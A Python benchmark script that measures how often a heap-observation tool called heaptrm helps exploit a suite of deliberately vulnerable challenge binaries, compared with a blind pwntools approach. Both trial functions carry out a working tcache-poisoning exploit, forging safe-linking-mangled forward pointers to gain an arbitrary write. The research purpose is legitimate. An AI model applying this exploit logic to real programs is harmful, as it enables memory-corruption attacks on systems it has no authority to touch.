File size: 8,037 Bytes
e1fab24 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 | #!/usr/bin/env python3
"""
same_session_benchmark.py β The correct benchmark.
Both approaches run in the SAME process session:
A: heaptrm session β observe addresses, compute exploit, execute in same session
B: blind session β same binary, same protocol, but no heap observation
This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed β the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""
import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict
# Directory two levels above this script; every other path is derived from it.
ROOT = Path(__file__).parent.parent
# Directory that holds manifest.json and the challenge binaries it names.
SUITE = ROOT.joinpath("cve_tests", "suite")
# heaptrm executable under heaptrm-cli/target/release, kept as a string
# because it is used directly as argv[0] for subprocess.Popen.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))
# Number of sessions run per challenge for each of the two approaches.
TRIALS = 10
def _poisoned_fd_hex(chunks) -> "str | None":
    """Derive the poisoned forward pointer from an observed chunk list.

    Args:
        chunks: Chunk records as found under ``heap.chunks`` in the reply to
            the ``observe`` action. Each record is read for its ``"state"``
            and its hex-string ``"address"``.

    Returns:
        ``target ^ (freed >> 12)`` packed as a little-endian 64-bit value and
        rendered as 16 hex characters, where ``freed`` is the highest freed
        chunk address and ``target`` the highest allocated one. ``None`` when
        fewer than two freed chunks or no allocated chunk were observed.

    Raises:
        KeyError, ValueError, struct.error: on malformed chunk records or a
            value that does not fit in 64 bits.
    """
    freed = []
    allocated = []
    for chunk in chunks:
        state = chunk["state"]
        if state == "freed":
            freed.append(int(chunk["address"], 16))
        elif state == "allocated":
            allocated.append(int(chunk["address"], 16))

    if len(freed) < 2 or not allocated:
        return None

    # Same shape as glibc's safe-linking mangling: pointer XOR (position >> 12).
    poisoned = max(allocated) ^ (max(freed) >> 12)
    return struct.pack("<Q", poisoned).hex()


def heaptrm_session(binary: str, sc: int) -> bool:
    """Run one observe-then-exploit trial inside a single heaptrm session.

    The target is driven through heaptrm's line-oriented JSON protocol: each
    request is ``{"action": ..., "data": ...}`` on one line and each reply is
    read back as one JSON line. The trial allocates three slots, frees two,
    asks heaptrm for the heap layout, derives the poisoned pointer from the
    observed addresses and replays the overwrite in the same process.

    Args:
        binary: Path of the challenge binary handed to heaptrm.
        sc: Value sent as the third field of every ``1 <slot> <sc>`` request
            (presumably a size or size class; confirm against the binaries).

    Returns:
        True when the reply to the final ``3 2`` request contains the marker
        ``50574e4544`` in its ``"output"`` field. False when the observation
        is unusable or any error occurs while talking to heaptrm.

    Raises:
        OSError: if the heaptrm executable cannot be started.
    """
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
    )

    def cmd(action, data=""):
        # One request line out, one reply line back; a blank reply maps to {}.
        # NOTE(review): readline() has no timeout, so a hung heaptrm blocks
        # the whole benchmark.
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        return json.loads(line) if line.strip() else {}

    try:
        # Setup: alloc 3, free 2.
        for request in (f"1 0 {sc}\n", f"1 1 {sc}\n", f"1 2 {sc}\n",
                        "4 0\n", "4 1\n"):
            cmd("send", request)

        # OBSERVE - this is what heaptrm provides.
        heap = cmd("observe").get("heap")
        # COMPUTE - deterministic given the addresses.
        fd_hex = _poisoned_fd_hex(heap["chunks"]) if heap else None
        if fd_hex is None:
            cmd("quit")
            return False

        # EXPLOIT - in the same session.
        cmd("send", f"2 1 {fd_hex}\n")
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")
        cmd("send", "2 4 50574e454421210a\n")
        reply = cmd("send", "3 2\n")
        cmd("quit")
        return "50574e4544" in reply.get("output", "")
    except Exception:
        # Best-effort trial: any protocol, parsing or I/O failure simply
        # counts as an unsuccessful attempt.
        return False
    finally:
        # Always reap the child, even after a clean "quit".
        try:
            proc.kill()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            pass
        # Close our pipe ends explicitly so repeated trials do not accumulate
        # open file descriptors.
        for pipe in (proc.stdin, proc.stdout):
            try:
                pipe.close()
            except OSError:
                pass
def _parse_leaked_address(reply):
    """Return the hex number following the first ``0x`` in *reply*, or None."""
    if not reply or b"0x" not in reply:
        return None
    try:
        return int(reply.split(b"0x")[1].split()[0], 16)
    except (ValueError, IndexError):
        return None


def _parse_leaked_fd(reply):
    """Parse the first 16 characters of a read reply as a hex number, or None.

    The sentinel replies ``b"DELETED"`` and ``b"ERR"`` are shorter than 16
    bytes, so the length check alone rejects them.
    """
    if len(reply) < 16:
        return None
    try:
        # NOTE(review): the marker check elsewhere suggests the binary prints
        # bytes in memory order; if so this big-endian parse yields a
        # byte-swapped value. Behaviour kept as-is; confirm the output format.
        return int(reply[:16], 16)
    except ValueError:
        return None


def _choose_poisoned_fd(addr0, addr1, addr2, leaked_fd):
    """Pick a poisoned pointer from whatever the binary leaked, or None."""
    if addr1 and addr2:
        return addr2 ^ (addr1 >> 12)
    if leaked_fd and not addr1:
        # Decrypt fd with a guessed key (0x555555559000 >> 12; presumably the
        # heap page when ASLR is off - TODO confirm).
        key = 0x555555559
        decrypted = leaked_fd ^ key
        if 0x555555550000 < decrypted < 0x555555570000:
            return (decrypted + 0xA0) ^ key
        return None
    if addr0 and not addr1 and not addr2:
        # Only the first address is known - guess 0x50 spacing for the rest.
        return (addr0 + 0xA0) ^ ((addr0 + 0x50) >> 12)
    return None


def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Run one exploit trial using only what the binary itself prints.

    The binary is driven directly through pwntools with the same request
    sequence as the heaptrm trial. Addresses are taken from ``0x...`` tokens
    in the allocation replies or from the reply to ``3 1`` (the "UAF read");
    when nothing is leaked, a fixed guess is used.

    Args:
        binary: Path of the challenge binary to spawn.
        sc: Value sent as the third field of every ``1 <slot> <sc>`` request.
        config: Manifest entry for the challenge. Not read here; kept so the
            caller's signature stays unchanged.

    Returns:
        True when the reply to the final ``3 2`` request contains the marker
        ``50574e4544``. False otherwise, including on any error while talking
        to the process.

    Raises:
        ImportError: if pwntools is not installed.
    """
    from pwn import process as pwn_process, p64, context

    context.log_level = "error"
    p = pwn_process(binary)

    def do(cmd):
        # Send one request line and read back one reply line (1 s timeout).
        p.sendline(cmd.encode())
        return p.recvline(timeout=1).strip()

    def attempt(poisoned):
        # Overwrite sequence shared by the informed and the blind path.
        do(f"2 1 {p64(poisoned).hex()[:16]}")
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")
        do("2 4 50574e454421210a")
        return b"50574e4544" in do("3 2")

    try:
        replies = [do(f"1 {slot} {sc}") for slot in range(3)]
        do("4 0")
        do("4 1")

        # Try to extract info from the binary's own output.
        addr0, addr1, addr2 = (_parse_leaked_address(r) for r in replies)
        leaked_fd = _parse_leaked_fd(do("3 1"))

        poisoned = _choose_poisoned_fd(addr0, addr1, addr2, leaked_fd)
        if poisoned is None:
            # Pure blind. Candidate heap offsets are 0x2a0, 0x300, 0x350,
            # 0x400, 0x450, 0x500, 0x550, 0x600, 0x650, 0x700, but a wrong
            # guess corrupts the tcache and would need a fresh process, so
            # one session can only ever test the first candidate.
            base = 0x555555559000
            chunk1 = base + 0x2A0 + 0x50
            target = chunk1 + 0x50
            poisoned = target ^ (chunk1 >> 12)

        return attempt(poisoned)
    except Exception:
        # Best-effort trial: a dead process, timeout or parse failure counts
        # as an unsuccessful attempt. KeyboardInterrupt is deliberately not
        # caught so the benchmark can be interrupted.
        return False
    finally:
        try:
            p.close()
        except Exception:
            pass
def main() -> None:
    """Run both approaches on every challenge in the manifest and report.

    Reads ``manifest.json`` from SUITE and skips entries whose binary is
    missing. Each remaining challenge gets TRIALS heaptrm sessions and TRIALS
    blind sessions. One line is printed per challenge, followed by a
    per-difficulty table and an overall row. Per-challenge results are written
    to ``bench/same_session_results.json`` relative to the current working
    directory.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text(encoding="utf-8"))
    rule = "=" * 80
    print(rule)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print(rule)

    # difficulty -> success counts for each approach and number of trials run
    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc):
                ht += 1
            if blind_session(binary, sc, config):
                bl += 1

        diff = config["difficulty"]
        bucket = by_diff[diff]
        bucket["ht"] += ht
        bucket["bl"] += bl
        bucket["n"] += TRIALS

        # Marker summarises how far heaptrm is ahead of the blind approach.
        delta = ht - bl
        if delta > TRIALS // 2:
            marker = ">>>"
        elif delta > 0:
            marker = ">"
        elif delta == 0:
            marker = "=="
        else:
            marker = "<"

        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")
        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]},
        })

    print("\n" + rule)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
    for diff in ["easy", "medium", "hard", "extreme"]:
        # .get() avoids inserting empty buckets into the defaultdict.
        d = by_diff.get(diff)
        if not d or d["n"] == 0:
            continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    total_n = sum(d["n"] for d in by_diff.values())
    if total_n:
        print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")
    else:
        # Empty manifest or no binaries on disk: nothing ran, so there is no
        # percentage to compute.
        print(f"{'OVERALL':10s} no challenge binaries found; nothing was run")

    out_dir = Path("bench")
    out_dir.mkdir(exist_ok=True)
    with open(out_dir / "same_session_results.json", "w", encoding="utf-8") as f:
        json.dump(all_results, f, indent=2)


if __name__ == "__main__":
    main()
|